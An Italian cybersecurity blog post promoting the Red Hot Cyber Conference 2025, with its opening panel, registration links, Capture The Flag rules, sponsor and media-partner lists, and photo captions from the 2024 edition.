Panel alla Red Hot Cyber Conference 2024. Da Sinistra a destr: Dott. Mario Nobile Direttore Generale di AGID, l’agenzia per l’Italia digitale, Dott. Umberto Rosini, Direttore Sistemi Informativi alla Presidenza del Consiglio dei Ministri – Dipartimento della Protezione Civile, Dott. Paolo Galdieri: Avvocato penalista, Cassazionista, è Docente universitario di Diritto penale dell’informatica, Ing. David Cenciotti: Giornalista aerospaziale, ex ufficiale dell’AM, ingegnere informatico ed esperto di cybersecurity
La giornata si aprirà con un panel istituzionale di alto livello, in cui esperti giuridici, rappresentanti delle istituzioni e professionisti del settore discuteranno di strategie e normative per la protezione digitale del Paese. Il tema del panel sarà “IL FUTURO DELLA CYBERSICUREZZA IN ITALIA – STRATEGIE PER LA PROSSIMA ERA DIGITALE”, un dibattito cruciale su come l’Italia si sta preparando ad affrontare le nuove minacce cyber, con un focus su regolamentazione, prevenzione e strategie nazionali per rafforzare la sicurezza digitale.

La Red Hot Cyber Conference 2025 sarà un’occasione unica per confrontarsi con i maggiori esperti del settore, approfondire i temi più attuali della sicurezza informatica e comprendere come il nostro Paese può affrontare le sfide digitali del futuro.

• Programma della Red Hot Cyber Conference 2025
• Registrazione per la sola giornata di Giovedì 8 Maggio (Workshop e Capture The Flag)
• Registrazione per la sola giornata di Venerdì 9 Maggio (Conferenza)
• Regolamento per la Capture The Flag (CTF)

Una inquadratura dei partecipanti alla Capture The Flag

Tutto Questo grazie Ai Nostri Sponsor

La realizzazione di questo evento non sarebbe possibile senza il prezioso supporto dei nostri sponsor. La loro collaborazione è fondamentale per offrire un’esperienza formativa e coinvolgente a tutti i partecipanti.

• Sponsor Sostenitori Workshop
  
  • Accenture Italia

  
  

• Sponsor Sostenitori
  
  • Fortinet
  • TrendMicro
  • Fata Informatica
  • Digital Value Cybersecurity
  • Enterprise
  • Akamai
  • Crowdstrike

  
  

• Sponsor Platinum
  
  • ITCentric
  • OPLIUM
  • Tinexta Cyber
  • Ermetix
  • S3K
  • Digimat

  
  

• Sponsor Gold
  
  • IAD
  • Olympos Consulting
  • CheckPoint technologies
  • Ancharia
  • Elmi
  • Utilia

  
  

• Sponsor Silver
  
  • Recorded Future
  • Delfi Security
  • Cyber Evolution
  • BraiIT

  
  

Inoltre ringraziamo tutti i nostri media Partner che sono i Fintech Awards, i Cyber Actors, Women 4 Cyber, Digital Security Summit, GDPR Day, E-Campus Università, Hackmageddon, CyberSecurityUP, Federazione Italiana Combattenti, Ri-Creazione, Aipsi e RedHotCyber Academy.

Invitiamo tutte le aziende interessate a sostenere la Red Hot Cyber Conference 2025 a contattarci per informazioni sui pacchetti di sponsorizzazione ancora disponibili. La vostra partecipazione contribuirà a promuovere la cultura della sicurezza informatica e a formare i professionisti del futuro.

• Programma della Red Hot Cyber Conference 2025
• Registrazione per la sola giornata di Giovedì 8 Maggio (Workshop e Capture The Flag)
• Registrazione per la sola giornata di Venerdì 9 Maggio (Conferenza)
• Regolamento per la Capture The Flag (CTF)

Non perdete l’opportunità di essere parte di questo importante appuntamento nel mondo della cybersecurity!
Dei ragazzi riprendono il workshop “hands on” Ragazzi che stanno seguendo i workshop “hands-on”Francesco Conti, Luca Vinciguerra e Salvatore RIcciardi del gruppo AI di Red Hot Cyber presentano il workshop “COME CREARE UN SISTEMA DI FACE RECOGNITION CON LE AI” Andrea Tassotti di CyberSecurityUP presenta il workshop “COME HACKERARE UN ESEGUIBILE ELUDENDO CONTROLLI APPLICATIVI” Immagine dei Ragazzi che giocano alla Capture The Flag Immagine dei Ragazzi che giocano alla Capture The Flag Immagine dei Ragazzi che giocano alla Capture The Flag Una inquadratura dei partecipanti alla Capture The Flag Platea alla Red Hot Cyber Conference 2024 Ingresso di SPOT della Boston Dynamics alla Red Hot Cyber Conference 2024 Pranzo alla Red Hot Cyber Conference 2024 Una inquadratura dei partecipanti alla CTF sulla seconda scalinata del teatro Una foto dello STAFF Al completo della Red Hot Cyber Conference 2024

L'articolo Due mesi alla RHC Conference 2025! Grazie ai nostri Sponsor per aver reso questo evento possibile! proviene da il blog della sicurezza informatica.